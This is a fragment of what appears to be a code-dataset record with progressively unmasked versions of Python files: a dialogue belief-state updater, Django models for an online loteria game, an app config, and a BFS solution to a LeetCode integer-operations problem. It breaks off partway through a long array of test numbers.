in new_belief_state\n except:\n raise Exception('Error: domain <{}> not in new belief state'.format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n # if nvalue != v:\n # _log('domain {} slot {} value {} -> {}'.format(domain, k, v, nvalue))\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(self.value_dict, domain, k, v)\n else:\n # raise Exception('unknown slot name <{}> of domain <{}>'.format(k, domain))\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'.format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n\n self.state = new_state\n \n return self.state\n\n def init_session(self):\n self.state = init_state()", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
from enum import unique from django.db import models import secrets import string CARD_PACK_CHOICES = ( ('1', 'Traditional Cards'), ('2', 'Special Cards'), ('3', 'Other Themed Cards') ) MARKER_CHOICES = ( ('1', 'Plastic Dots'), ('2', 'Quarters'), ('3', 'Beans') ) def generate_game_code() -> int: """ Generates a unique game code. Returns ------- int - a unique 7 digit numerical code """ while True: # code will only contain digits code_options = string.digits generated_game_code = ''.join(secrets.choice(code_options) for i in range(7)) if Game.objects.filter(game_code=generated_game_code).count() == 0: break return int(generated_game_code) def generate_player_id() -> string: """Generates a unique player id. Returns ------- string - a unique 5 digit alphaneumeric code """ while True: # code will have uppercase letters and numbers code_options = string.ascii_uppercase + string.digits generated_player_id = ''.join(secrets.choice(code_options) for i in range(5)) if Player.objects.filter(player_id=generated_player_id).count() == 0: break return generated_player_id # Create your models here. class Game( models.Model): """ Model that describes a loteria game Fields ------ cards_id : int - the id of the card theme chosen by user during creation of game. created_at : dateTime - the time that the game was started. game_code : int - a unique 7 digit code assigned during creation needed to join games. host : string - the session key of the person who started the game ensures that users do not have more that 1 running game. game_over : bool - defaults to True for now but will default to False upon creation. maker_id : int - the id of the marker type chosen by user during creation of game. Notes ----- - Considering making game_code primary key instead """ # default 0 will just be regular loteria cards # TODO cards_id and marker_id should be choices not harded coded values game_code = models.IntegerField(null=False, default=generate_game_code, unique=True) created_at = models.DateTimeField(auto_now_add=True) host = models.CharField(max_length=100, unique=True) cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES, default='1') marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES, default='1') game_over = models.BooleanField(default=True) class Player(models.Model): """ Model that describes a Player in the Game Attributes ---------- name : string the display name of the player. wins : int the number of times this player has won. losses : int the number of times this player has lost. player_id : string the id assigned to a player during a game. game_code : int the game code of the game joined, will be null if no game has been joined. """ player_id = models.CharField(max_length=15, default=generate_player_id, unique=True) name = models.CharField(max_length=100, unique=False) game_code = models.IntegerField(null=False, unique=False) wins = models.IntegerField(null=False, default=0) losses = models.IntegerField(null=False, default=0) host_key = models.CharField(max_length=100, unique=True)
normal
{ "blob_id": "2fd33439d4403ec72f890a1d1b4f35f2b38d033b", "index": 9268, "step-1": "<mask token>\n\n\nclass Game(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id,\n unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n", "step-2": "<mask token>\n\n\ndef generate_game_code() ->int:\n \"\"\" Generates a unique game code.\n \n Returns\n -------\n int\n - a unique 7 digit numerical code\n \"\"\"\n while True:\n code_options = string.digits\n generated_game_code = ''.join(secrets.choice(code_options) for i in\n range(7))\n if Game.objects.filter(game_code=generated_game_code).count() == 0:\n break\n return int(generated_game_code)\n\n\n<mask token>\n\n\nclass Game(models.Model):\n \"\"\" Model that describes a loteria game\n\n Fields\n ------\n cards_id : int\n - the id of the card theme chosen by user during creation of game.\n\n created_at : dateTime\n - the time that the game was started.\n\n game_code : int\n - a unique 7 digit code assigned during creation \n needed to join games.\n\n host : string\n - the session key of the person who started the game\n ensures that users do not have more that 1 running game.\n\n game_over : bool\n - defaults to True for now but will default to False upon creation.\n\n maker_id : int\n - the id of the marker type chosen by user during creation of game.\n\n Notes\n -----\n - Considering making game_code primary key instead\n \"\"\"\n game_code = models.IntegerField(null=False, default=generate_game_code,\n unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n host = models.CharField(max_length=100, unique=True)\n cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES,\n default='1')\n marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES,\n default='1')\n game_over = models.BooleanField(default=True)\n\n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id,\n unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n", "step-3": "<mask token>\nCARD_PACK_CHOICES = ('1', 'Traditional Cards'), ('2', 'Special Cards'), ('3',\n 'Other Themed Cards')\nMARKER_CHOICES = ('1', 'Plastic Dots'), ('2', 'Quarters'), ('3', 'Beans')\n\n\ndef generate_game_code() ->int:\n \"\"\" Generates a unique game code.\n \n Returns\n -------\n int\n - a unique 7 digit numerical code\n \"\"\"\n while True:\n code_options = string.digits\n generated_game_code = ''.join(secrets.choice(code_options) for i in\n range(7))\n if Game.objects.filter(game_code=generated_game_code).count() == 0:\n break\n return int(generated_game_code)\n\n\ndef generate_player_id() ->string:\n \"\"\"Generates a unique player id.\n \n Returns\n -------\n string\n - a unique 5 digit alphaneumeric code\n \"\"\"\n while True:\n code_options = string.ascii_uppercase + string.digits\n generated_player_id = ''.join(secrets.choice(code_options) for i in\n range(5))\n if Player.objects.filter(player_id=generated_player_id).count() == 0:\n break\n return generated_player_id\n\n\nclass Game(models.Model):\n \"\"\" Model that describes a loteria game\n\n Fields\n ------\n cards_id : int\n - the id of the card theme chosen by user during creation of game.\n\n created_at : dateTime\n - the time that the game was started.\n\n game_code : int\n - a unique 7 digit code assigned during creation \n needed to join games.\n\n host : string\n - the session key of the person who started the game\n ensures that users do not have more that 1 running game.\n\n game_over : bool\n - defaults to True for now but will default to False upon creation.\n\n maker_id : int\n - the id of the marker type chosen by user during creation of game.\n\n Notes\n -----\n - Considering making game_code primary key instead\n \"\"\"\n game_code = models.IntegerField(null=False, default=generate_game_code,\n unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n host = models.CharField(max_length=100, unique=True)\n cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES,\n default='1')\n marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES,\n default='1')\n game_over = models.BooleanField(default=True)\n\n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id,\n unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n", "step-4": "from enum import unique\nfrom django.db import models\nimport secrets\nimport string\nCARD_PACK_CHOICES = ('1', 'Traditional Cards'), ('2', 'Special Cards'), ('3',\n 'Other Themed Cards')\nMARKER_CHOICES = ('1', 'Plastic Dots'), ('2', 'Quarters'), ('3', 'Beans')\n\n\ndef generate_game_code() ->int:\n \"\"\" Generates a unique game code.\n \n Returns\n -------\n int\n - a unique 7 digit numerical code\n \"\"\"\n while True:\n code_options = string.digits\n generated_game_code = ''.join(secrets.choice(code_options) for i in\n range(7))\n if Game.objects.filter(game_code=generated_game_code).count() == 0:\n break\n return int(generated_game_code)\n\n\ndef generate_player_id() ->string:\n \"\"\"Generates a unique player id.\n \n Returns\n -------\n string\n - a unique 5 digit alphaneumeric code\n \"\"\"\n while True:\n code_options = string.ascii_uppercase + string.digits\n generated_player_id = ''.join(secrets.choice(code_options) for i in\n range(5))\n if Player.objects.filter(player_id=generated_player_id).count() == 0:\n break\n return generated_player_id\n\n\nclass Game(models.Model):\n \"\"\" Model that describes a loteria game\n\n Fields\n ------\n cards_id : int\n - the id of the card theme chosen by user during creation of game.\n\n created_at : dateTime\n - the time that the game was started.\n\n game_code : int\n - a unique 7 digit code assigned during creation \n needed to join games.\n\n host : string\n - the session key of the person who started the game\n ensures that users do not have more that 1 running game.\n\n game_over : bool\n - defaults to True for now but will default to False upon creation.\n\n maker_id : int\n - the id of the marker type chosen by user during creation of game.\n\n Notes\n -----\n - Considering making game_code primary key instead\n \"\"\"\n game_code = models.IntegerField(null=False, default=generate_game_code,\n unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n host = models.CharField(max_length=100, unique=True)\n cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES,\n default='1')\n marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES,\n default='1')\n game_over = models.BooleanField(default=True)\n\n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id,\n unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n", "step-5": "from enum import unique\nfrom django.db import models\n\nimport secrets\nimport string\n\nCARD_PACK_CHOICES = (\n ('1', 'Traditional Cards'),\n ('2', 'Special Cards'),\n ('3', 'Other Themed Cards')\n)\n\nMARKER_CHOICES = (\n ('1', 'Plastic Dots'),\n ('2', 'Quarters'),\n ('3', 'Beans')\n)\n\ndef generate_game_code() -> int:\n \"\"\" Generates a unique game code.\n \n Returns\n -------\n int\n - a unique 7 digit numerical code\n \"\"\"\n while True:\n # code will only contain digits\n code_options = string.digits\n generated_game_code = ''.join(secrets.choice(code_options) for i in range(7))\n if Game.objects.filter(game_code=generated_game_code).count() == 0:\n break\n return int(generated_game_code)\n\ndef generate_player_id() -> string:\n \"\"\"Generates a unique player id.\n \n Returns\n -------\n string\n - a unique 5 digit alphaneumeric code\n \"\"\"\n while True:\n # code will have uppercase letters and numbers\n code_options = string.ascii_uppercase + string.digits\n generated_player_id = ''.join(secrets.choice(code_options) for i in range(5))\n if Player.objects.filter(player_id=generated_player_id).count() == 0:\n break\n return generated_player_id\n\n# Create your models here.\nclass Game( models.Model):\n \"\"\" Model that describes a loteria game\n\n Fields\n ------\n cards_id : int\n - the id of the card theme chosen by user during creation of game.\n\n created_at : dateTime\n - the time that the game was started.\n\n game_code : int\n - a unique 7 digit code assigned during creation \n needed to join games.\n\n host : string\n - the session key of the person who started the game\n ensures that users do not have more that 1 running game.\n\n game_over : bool\n - defaults to True for now but will default to False upon creation.\n\n maker_id : int\n - the id of the marker type chosen by user during creation of game.\n\n Notes\n -----\n - Considering making game_code primary key instead\n \"\"\"\n # default 0 will just be regular loteria cards\n # TODO cards_id and marker_id should be choices not harded coded values\n game_code = models.IntegerField(null=False, default=generate_game_code, unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n host = models.CharField(max_length=100, unique=True)\n cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES, default='1')\n marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES, default='1')\n game_over = models.BooleanField(default=True)\n \n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id, unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n\n\n ", "step-ids": [ 4, 7, 9, 10, 11 ] }
[ 4, 7, 9, 10, 11 ]
default_app_config = 'child.apps.ChildConfig'
normal
{ "blob_id": "290f96bb210a21183fe1e0e53219ad38ba889625", "index": 1602, "step-1": "<mask token>\n", "step-2": "default_app_config = 'child.apps.ChildConfig'\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
''' -Medium- *BFS* You are given a 0-indexed integer array nums containing distinct numbers, an integer start, and an integer goal. There is an integer x that is initially set to start, and you want to perform operations on x such that it is converted to goal. You can perform the following operation repeatedly on the number x: If 0 <= x <= 1000, then for any index i in the array (0 <= i < nums.length), you can set x to any of the following: x + nums[i] x - nums[i] x ^ nums[i] (bitwise-XOR) Note that you can use each nums[i] any number of times in any order. Operations that set x to be out of the range 0 <= x <= 1000 are valid, but no more operations can be done afterward. Return the minimum number of operations needed to convert x = start into goal, and -1 if it is not possible. Example 1: Input: nums = [2,4,12], start = 2, goal = 12 Output: 2 Explanation: We can go from 2 → 14 → 12 with the following 2 operations. - 2 + 12 = 14 - 14 - 2 = 12 Example 2: Input: nums = [3,5,7], start = 0, goal = -4 Output: 2 Explanation: We can go from 0 → 3 → -4 with the following 2 operations. - 0 + 3 = 3 - 3 - 7 = -4 Note that the last operation sets x out of the range 0 <= x <= 1000, which is valid. Example 3: Input: nums = [2,8,16], start = 0, goal = 1 Output: -1 Explanation: There is no way to convert 0 into 1. Constraints: 1 <= nums.length <= 1000 -109 <= nums[i], goal <= 109 0 <= start <= 1000 start != goal All the integers in nums are distinct. ''' from typing import List from collections import deque class Solution: def minimumOperations(self, nums: List[int], start: int, goal: int) -> int: que = deque([(start,0)]) visited = set() while que: x, steps = que.popleft() for i in nums: for t in [x+i, x-i, x^i]: if t == goal: return steps + 1 if 0 <= t <= 1000 and t not in visited: visited.add(t) que.append((t, steps+1)) return -1 if __name__ == "__main__": print(Solution().minimumOperations(nums = [2,4,12], start = 2, goal = 12)) print(Solution().minimumOperations(nums = [3,5,7], start = 0, goal = -4)) print(Solution().minimumOperations(nums = [2,8,16], start = 0, goal = 1)) nums = [-574083075,-393928592,-508025046,942818778,355796909,515245901,40297943,106087952,112856312,-516143616,363801856,431681353,726373078,947630603,357311001,594181298,-797268217,-741740009,310972287,588107527,-535699426,56324906,-77958073,739798122,-839472160,439902753,-599749231,-378067373,-466272504,-668036170,404827976,805486978,-762507067,726001618,-761047930,574054980,365793614,112020312,612806855,-256862366,174046424,646109365,263765015,952305939,864217737,-236873371,-991807014,365730786,-908194963,-778205177,-949314048,-636570500,-883257881,316313456,-846577965,132287864,-143230736,425542510,-99852882,-845180792,-329895545,402782707,-52191127,-470380017,-788836785,-655887976,-899430590,481923982,45348738,-595401481,-470990760,-417390352,-570278840,-873871723,-905595403,276201114,-733014032,126018863,452235438,-512574658,-172220362,845468743,-743189114,597319839,-584451932,410604481,-508885990,-670396751,-765996786,345814977,-920014372,-826696704,640912714,119494504,745808962,-503060001,-677959595,-831428592,282855843,150678167,-467803553,-503929808,636431692,-235369757,-964826080,93942566,-65314422,-385277528,-379647659,601981747,-724269861,-516713072,-487487495,655771565,406499531,-943540581,-290169291,438686645,-227355533,-822612523,218329747,-800810927,-944724740,-978181517,274815523,296317841,56043572,-712672386,-374759873,86973233,-246165119,73819230,-801140338,414767806,883318746,-822063159,-705772942,-674915800,710520717,-97115365,599549847,115344568,53002314,242487774,-665998906,-986068895,-844909606,-515222297,-500827406,317865850,-50395059,522417393,51184184,241544846,-996297136,-227251827,924359619,822815774,149467545,523511343,252991991,450254984,-393459583,617410075,197030479,-234418418,-256650708,872334551,779068346,216294504,-708680875,-171498970,-970211466,-176493993,729939373,-658054782,-342680218,75508900,-377139149,392008859,121412250,-163586626,-468148273,624248706,50004864,-862378428,-849927586,33598413,-157654824,-229712613,149116317,183820138,378717707,-995563605,777654910,511275580,-157964872,-718605034,-764316227,-225837302,-166208500,-587688677,78982205,-488693575,667205793,419165994,731543316,97551954,-387317666,-580873271,533504431,-31624036,-356035140,-849089082,-767376392,-625237600,940717947,-337709497,915255567,727274007,-879463448,-363148174,-854892492,110472344,-466194659,-146843198,-454944217,-365338018,-349424052,994474446,-554968068,-883734951,-697723265,583756420,-5696410,-413731452,-278706136,-399245668,83345207,-227231270,618384545,846514423,-556667092,590460194,-686116067,-509669269,-510065093,77094171,270317951,166095128,-918526061,-766370855,-20861321,478791777,663673443,-152055285,224745414,123998803,66824877,-85117337,212126175,-718523523,615359230,-212148589,620733736,-81197397,51814471,709312024,562145805,-770811828,321230393,-611636320,-421337549,-804527290,-416739656,-886764000,170695026,414273830,-449987380,-56782953,772039002,-961265403,-896009751,-524231358,497253209,-507048459,-308522246,-508249054,-53240581,-241704483,-974133571,232897679,-152365934,-861310248,-305766289,340680726,844612779,-180227470,40798478,729446447,395975250,-142447074,-606021375,47555730,294446347,452346091,-409427076,-845574381,-838995437,45787728,714700474,-315824001,694717388,502723269,119244099,-538412679,-207297135,-189078560,-812610469,-350061253,-73975237,-119323509,791863263,741180208,740488891,-475394166,-191585617,-441527154,767292531,201222965,-150196525,588513813,245328283,396662663,100705864,126789247,487161165,-460512081,-469521559,-998848254,-917609155,314537168,418002454,-926920818,-628671538,179971032,-105401559,449618919,823404672,178494651,-773108884,10686795,-506642993,-60172121,-510142552,651623281,-163851428,158562600,-782456228,-336697076,-571952851,849878818,-456510759,-65997243,-506043404,-558981572,186946604,124948039,954065944,707437320,-224056616,-319237038,512138196,742466011,-49725596,-784781640,-753413026,-331602365,-246166733,-658650959,-4888181,-547553549,786689548,-866846384,-212028209,-98029403,-325422497,-409855095,320083382,-491251215,-471713326,890922019,-766590943,-481641953,-227197451,-709166930,-965945544,407688175,-78385698,-372800469,389036825,79885300,-858488452,-390177477,233839191,-518116358,420408256,872470025,241770824,-106901417,-328631191,548580365,-88408815,-647601013,658880218,-870455388,277154380,370022702,-381519264,-800726224,183685380,208169777,925905330,732494840,251754641,-681988029,593628349,153852085,353590607,242118102,-788094641,-242801844,474214244,579450364,580046580,-269927114,249739292,295331955,-544556236,-814569172,808895922,707421114,305101587,621173158,-248896453,988552702,-375313331,-87289858,-796466539,-529411285,-197315984,33984203,-122839651,-90735568,277265491,762059774,-628018119,-406508643,-856856769,364613737,59319066,614382155,-614620718,-133957131,-394985422,-29943491,154443077,-72727846,392096990,562681453,364248049,-156700958,717335155,-343408748,77301840,-155372684,-432114609,414752267,-485732822,876096548,842614035,-614245110,-872219121,291509502,334817026,214330487,405297459,-449582485,789314834,936409758,452350380,-146649749,898255045,116506422,671728835,280507922,-189039799,-565803074,-439924663,-14345985,-98428526,57303809,424685389,-84977856,-9251973,998935249,229402894,-405424548,448394272,182149207,-728030940,347577568,567511928,-27655302,400866779,-509269521,-580602375,405956020,-855173313,258091129,909162200,-315251598,-236890006,-531780379,342955474,-65890269,-111521851,-139906773,34939329,927781348,300458386,-603518159,341287362,-234266006,634183737,454833275,79631354,-954691672,102295826,688738167,-958428411,-293858940,480440548,590037773,-365477625,-425165732,170388756,164258145,-507355122,44132561,982798160,-101120201,-920959602,-239250887,534862084,-834736952,-123162323,389682556,656996523,864481760,381156936,129520066,-995551618,106129054,-471580461,856850511,653020333,531769579,-190375506,-992983956,73867968,-931909584,403329114,-945055546,627782991,-666011011,214665550,505169020,210703185,-591690068,11218620,790987020,561646751,-33552011,-407054835,-850936697,-838201457,-878394038,-759131062,-857347819,531582062,941614352,-743754869,650338718,178603580,-834368178,-976933957,138667533,746471721,551579035,-173400777,-1191455,320121832,-756997945,402594806,934711944,970489131,-193223639,276816990,842959026,-799673669,-367385466,681433973,468892554,-455199860,393993101,905435993,218314965,284795080,913357885,-652530417,743455659,869345718,808902357,829820413,7206928,544900359,225903242,-507688526,750219353,-663810717,-643969173,-269151675,348252329,-144351998,693995296,-692546103,869432378,650161259,568234384,710782517,179157604,-446849233,-922615096,-61183498,30945194,819052356,467911324,119876349,46908453,-420671619,344944591,889080726,-619477633,174882730,553799129,-941691933,146036558,-116064711,222282163,-272996845,-147041859,-381977096,-786757040,229096334,712541239,326039628,-952490563,-362214129,-680530864,421358212,-472290821,-331398150,-42297937,-393141325,-467541333,655524006,452908624,-626562356,-758303565,338224482,312047704,599445442,-328430584,259549134,838272865,-755896597,-151000710,607787908,11870257,-680877184,528161590,769242561,-447486537,-127579653,135915595,-271181270,12536315,693445551,900639800,-692327759,-671179999,977783490,935798407,659688020,-478438023,-852131846,-900332354,-71029072,888095095,924175448,430392829,391195112,399460998,-173259008,-168543477,-495967896,-697314804,591126097,301126906,946273416,-772817341,-996445410,466876435,-92937212,-226599286,43831927,-588596503,-55759661,212885530,-805455693,572269060,415773175,-320900489,-651775079,5276363,91615150,-882588415,502210147,-401039810,26713405,-723806893,125439289,472777644,869504248,967552969,-268043646,-146710780,-511973692,-803204681,-146827180,-453201623,-878534466,631307563,507752930,-63646026,-348120807,222898965,-410732708,617953050,-478244422,877782569,-507956686,-196516478,-477074335,329039585,-480651334,-890030740,461391919,-977815738,-943937849,321402466,-588396975,-945139052,871313567,-484830305,365305963,891985414,466048577,880607400,-245705654,359506342,-612177301,840415132,693541406,707348310,971762025,-871678269,897143169,625100531,743908163,-315815019,-63211252,-962051459,510469141,566817231,-186207711,309838979,101194721,-127111899,-109107404,-702499174,918781433,34041307,927374088,-67369303,-680339659,202481166,-218771120,329951816,-280782626,-423403505,619779171,-567310903,-660420942,756801677,996208091,822990010,940351540,1331227,382201579,891956260,-894584436,346600029,805733487,-691767750,859030444,1] print(Solution().minimumOperations(nums, 938, 80))
normal
{ "blob_id": "50b2b9d1edc8eaa44050e2b3b2375e966f16e10c", "index": 6997, "step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Solution:\n\n def minimumOperations(self, nums: List[int], start: int, goal: int) ->int:\n que = deque([(start, 0)])\n visited = set()\n while que:\n x, steps = que.popleft()\n for i in nums:\n for t in [x + i, x - i, x ^ i]:\n if t == goal:\n return steps + 1\n if 0 <= t <= 1000 and t not in visited:\n visited.add(t)\n que.append((t, steps + 1))\n return -1\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Solution:\n\n def minimumOperations(self, nums: List[int], start: int, goal: int) ->int:\n que = deque([(start, 0)])\n visited = set()\n while que:\n x, steps = que.popleft()\n for i in nums:\n for t in [x + i, x - i, x ^ i]:\n if t == goal:\n return steps + 1\n if 0 <= t <= 1000 and t not in visited:\n visited.add(t)\n que.append((t, steps + 1))\n return -1\n\n\nif __name__ == '__main__':\n print(Solution().minimumOperations(nums=[2, 4, 12], start=2, goal=12))\n print(Solution().minimumOperations(nums=[3, 5, 7], start=0, goal=-4))\n print(Solution().minimumOperations(nums=[2, 8, 16], start=0, goal=1))\n nums = [-574083075, -393928592, -508025046, 942818778, 355796909, \n 515245901, 40297943, 106087952, 112856312, -516143616, 363801856, \n 431681353, 726373078, 947630603, 357311001, 594181298, -797268217, \n -741740009, 310972287, 588107527, -535699426, 56324906, -77958073, \n 739798122, -839472160, 439902753, -599749231, -378067373, -\n 466272504, -668036170, 404827976, 805486978, -762507067, 726001618,\n -761047930, 574054980, 365793614, 112020312, 612806855, -256862366,\n 174046424, 646109365, 263765015, 952305939, 864217737, -236873371, \n -991807014, 365730786, -908194963, -778205177, -949314048, -\n 636570500, -883257881, 316313456, -846577965, 132287864, -143230736,\n 425542510, -99852882, -845180792, -329895545, 402782707, -52191127,\n -470380017, -788836785, -655887976, -899430590, 481923982, 45348738,\n -595401481, -470990760, -417390352, -570278840, -873871723, -\n 905595403, 276201114, -733014032, 126018863, 452235438, -512574658,\n -172220362, 845468743, -743189114, 597319839, -584451932, 410604481,\n -508885990, -670396751, -765996786, 345814977, -920014372, -\n 826696704, 640912714, 119494504, 745808962, -503060001, -677959595,\n -831428592, 282855843, 150678167, -467803553, -503929808, 636431692,\n -235369757, -964826080, 93942566, -65314422, -385277528, -379647659,\n 601981747, -724269861, -516713072, -487487495, 655771565, 406499531,\n -943540581, -290169291, 438686645, -227355533, -822612523, \n 218329747, -800810927, -944724740, -978181517, 274815523, 296317841,\n 56043572, -712672386, -374759873, 86973233, -246165119, 73819230, -\n 801140338, 414767806, 883318746, -822063159, -705772942, -674915800,\n 710520717, -97115365, 599549847, 115344568, 53002314, 242487774, -\n 665998906, -986068895, -844909606, -515222297, -500827406, \n 317865850, -50395059, 522417393, 51184184, 241544846, -996297136, -\n 227251827, 924359619, 822815774, 149467545, 523511343, 252991991, \n 450254984, -393459583, 617410075, 197030479, -234418418, -256650708,\n 872334551, 779068346, 216294504, -708680875, -171498970, -970211466,\n -176493993, 729939373, -658054782, -342680218, 75508900, -377139149,\n 392008859, 121412250, -163586626, -468148273, 624248706, 50004864, \n -862378428, -849927586, 33598413, -157654824, -229712613, 149116317,\n 183820138, 378717707, -995563605, 777654910, 511275580, -157964872,\n -718605034, -764316227, -225837302, -166208500, -587688677, \n 78982205, -488693575, 667205793, 419165994, 731543316, 97551954, -\n 387317666, -580873271, 533504431, -31624036, -356035140, -849089082,\n -767376392, -625237600, 940717947, -337709497, 915255567, 727274007,\n -879463448, -363148174, -854892492, 110472344, -466194659, -\n 146843198, -454944217, -365338018, -349424052, 994474446, -\n 554968068, -883734951, -697723265, 583756420, -5696410, -413731452,\n -278706136, -399245668, 83345207, -227231270, 618384545, 846514423,\n -556667092, 590460194, -686116067, -509669269, -510065093, 77094171,\n 270317951, 166095128, -918526061, -766370855, -20861321, 478791777,\n 663673443, -152055285, 224745414, 123998803, 66824877, -85117337, \n 212126175, -718523523, 615359230, -212148589, 620733736, -81197397,\n 51814471, 709312024, 562145805, -770811828, 321230393, -611636320, \n -421337549, -804527290, -416739656, -886764000, 170695026, \n 414273830, -449987380, -56782953, 772039002, -961265403, -896009751,\n -524231358, 497253209, -507048459, -308522246, -508249054, -\n 53240581, -241704483, -974133571, 232897679, -152365934, -861310248,\n -305766289, 340680726, 844612779, -180227470, 40798478, 729446447, \n 395975250, -142447074, -606021375, 47555730, 294446347, 452346091, \n -409427076, -845574381, -838995437, 45787728, 714700474, -315824001,\n 694717388, 502723269, 119244099, -538412679, -207297135, -189078560,\n -812610469, -350061253, -73975237, -119323509, 791863263, 741180208,\n 740488891, -475394166, -191585617, -441527154, 767292531, 201222965,\n -150196525, 588513813, 245328283, 396662663, 100705864, 126789247, \n 487161165, -460512081, -469521559, -998848254, -917609155, \n 314537168, 418002454, -926920818, -628671538, 179971032, -105401559,\n 449618919, 823404672, 178494651, -773108884, 10686795, -506642993, \n -60172121, -510142552, 651623281, -163851428, 158562600, -782456228,\n -336697076, -571952851, 849878818, -456510759, -65997243, -\n 506043404, -558981572, 186946604, 124948039, 954065944, 707437320, \n -224056616, -319237038, 512138196, 742466011, -49725596, -784781640,\n -753413026, -331602365, -246166733, -658650959, -4888181, -\n 547553549, 786689548, -866846384, -212028209, -98029403, -325422497,\n -409855095, 320083382, -491251215, -471713326, 890922019, -\n 766590943, -481641953, -227197451, -709166930, -965945544, \n 407688175, -78385698, -372800469, 389036825, 79885300, -858488452, \n -390177477, 233839191, -518116358, 420408256, 872470025, 241770824,\n -106901417, -328631191, 548580365, -88408815, -647601013, 658880218,\n -870455388, 277154380, 370022702, -381519264, -800726224, 183685380,\n 208169777, 925905330, 732494840, 251754641, -681988029, 593628349, \n 153852085, 353590607, 242118102, -788094641, -242801844, 474214244,\n 579450364, 580046580, -269927114, 249739292, 295331955, -544556236,\n -814569172, 808895922, 707421114, 305101587, 621173158, -248896453,\n 988552702, -375313331, -87289858, -796466539, -529411285, -\n 197315984, 33984203, -122839651, -90735568, 277265491, 762059774, -\n 628018119, -406508643, -856856769, 364613737, 59319066, 614382155, \n -614620718, -133957131, -394985422, -29943491, 154443077, -72727846,\n 392096990, 562681453, 364248049, -156700958, 717335155, -343408748,\n 77301840, -155372684, -432114609, 414752267, -485732822, 876096548,\n 842614035, -614245110, -872219121, 291509502, 334817026, 214330487,\n 405297459, -449582485, 789314834, 936409758, 